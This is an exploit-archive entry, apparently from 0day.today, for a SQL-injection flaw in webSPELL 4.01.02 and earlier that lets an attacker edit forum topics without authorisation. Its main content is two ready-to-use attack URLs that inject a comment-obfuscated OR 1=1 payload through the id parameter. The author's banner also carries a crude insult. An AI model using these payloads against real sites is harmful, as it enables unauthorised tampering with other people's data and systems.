id: 4595
date: 01/04/2009
title: webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability
author: StAkeR
cves: 

=========================================================
webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability
=========================================================


+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
|  webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability  |      Note       |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker                                | magic quotes 0  |       
| download on http://wesbpell.org                             | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Exploit                                                                       |
| index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/*    |
| index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/*       |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=+



#  0day.today [2023-03-27]  #